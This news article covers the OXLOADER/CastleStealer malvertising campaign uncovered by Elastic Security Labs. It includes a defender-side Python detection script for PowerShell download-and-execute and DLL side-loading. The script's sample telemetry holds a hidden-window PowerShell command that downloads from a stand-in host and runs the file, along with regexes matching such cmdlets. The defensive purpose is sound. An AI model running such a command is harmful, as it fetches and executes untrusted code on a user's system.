Cybersecurity experts have revealed a new wave of cyberattacks involving a malware loader known as OXLOADER. This tool is employed to distribute CastleStealer, a type of information-stealing malware. The campaign, uncovered by Elastic Security Labs, features the use of deceptive Google Ads to initiate the malware distribution process.
Malicious Ads Fuel Cyber Threat
The campaign, identified as REF8372, employs malicious advertisements to lure victims. Researchers suggest the individuals behind the attack may be Russian-speaking and financially driven, as they avoid targeting systems in the Commonwealth of Independent States (CIS). The campaign’s obfuscation techniques include control-flow flattening and mixed Boolean-Arithmetic, which obscure the malware’s code and hinder analysis.
Users searching for terms like “lts version of node.js” may inadvertently access a counterfeit site through fraudulent ads. The ads, falsely attributed to a Ukrainian entity, “ВОЛОДИМИР ТЕРЕЩЕНКО,” were removed by Google on May 14, 2026. Whether this advertiser account is directly linked to the attackers or a front remains unclear.
Unveiling the Attack Methodology
The attack initiates when users interact with the fraudulent site, leading to the download of a batch script hosted on Storj, a decentralized storage service. This method illustrates the ongoing exploitation of legitimate platforms to bypass security filters. The script launches a fake installation wizard while covertly downloading and executing OXLOADER via a PowerShell command, triggering a User Account Control (UAC) prompt.
Further complicating detection, the attack uses DLL side-loading to deploy a rogue DLL, which decrypts and runs the CastleStealer payload. Techniques such as control-flow flattening and mixed Boolean-Arithmetic are employed to avoid detection, while anti-VM measures ensure the malware does not run in sandbox environments.
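A defender-side illustration of the chain just described, added here and not taken from Elastic’s report: heuristic checks over constructed Sysmon-style process-creation and image-load events that flag a batch-spawned PowerShell download-and-execute and an unsigned DLL loaded beside its host from a user-writable folder. Field names, paths and the sample command line are assumptions of this example, not indicators from the campaign.

```python
import ntpath
import re

DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer", re.I)
EXECUTE = re.compile(r"start-process|invoke-expression|\biex\b", re.I)  # fetch AND run in one command
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
USER_WRITABLE = re.compile(r"\\(temp|appdata|downloads|public)\\", re.I)  # assumed dropped-file locations

def flag_process_create(ev: dict) -> list[str]:
    """Reasons a process-creation event matches a batch-launched PowerShell downloader."""
    parent = ev.get("ParentImage", "").lower()
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    hits = []
    if parent.endswith("\\cmd.exe") and image.endswith("\\powershell.exe"):
        if DOWNLOAD.search(cmd) and EXECUTE.search(cmd):
            hits.append("batch-spawned PowerShell downloads and executes a payload")
        if HIDDEN.search(cmd):
            hits.append("PowerShell started with a hidden window")
    return hits

def flag_image_load(ev: dict) -> list[str]:
    """Reasons an image-load event looks like DLL side-loading from a dropped folder."""
    host, dll = ev.get("Image", ""), ev.get("ImageLoaded", "")
    same_dir = ntpath.dirname(host).lower() == ntpath.dirname(dll).lower()
    if dll.lower().endswith(".dll") and same_dir and USER_WRITABLE.search(dll) and ev.get("Signed") != "true":
        return [f"unsigned DLL loaded beside its host from a user-writable path: {dll}"]
    return []

def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run both heuristics over an event stream; return (event index, reason) pairs."""
    findings = []
    for i, ev in enumerate(events):
        handler = flag_process_create if ev.get("EventType") == "ProcessCreate" else flag_image_load
        findings.extend((i, reason) for reason in handler(ev))
    return findings

# Constructed sample telemetry (not real IoCs); field names follow Sysmon naming as an assumption.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://example.invalid/s -OutFile $env:TEMP\s.exe; Start-Process $env:TEMP\s.exe"'},
    {"EventType": "ProcessCreate", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell Get-Date"},
    {"EventType": "ImageLoad", "Image": r"C:\Users\alice\AppData\Local\Temp\setup\host.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\setup\helper.dll", "Signed": "false"},
    {"EventType": "ImageLoad", "Image": r"C:\Program Files\App\app.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
]
```

Running `scan(SAMPLE_EVENTS)` flags only the first and third events; the benign PowerShell launch and the system DLL load produce no findings.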
Implications and Future Monitoring
CastleStealer, a .NET-based information stealer, is part of a broader campaign known as BackgroundFix, previously linked with CastleLoader. The activity is associated with a threat group identified as GrayBravo. Despite being in its early stages, OXLOADER’s sophisticated design indicates potential for significant impact.
Elastic Security Labs emphasizes that the malware’s engineering reflects deliberate efforts to evade detection and analysis. This has resulted in low detection rates across various security engines, allowing OXLOADER to operate under the radar. The cybersecurity community is advised to keep a close watch on this evolving threat.
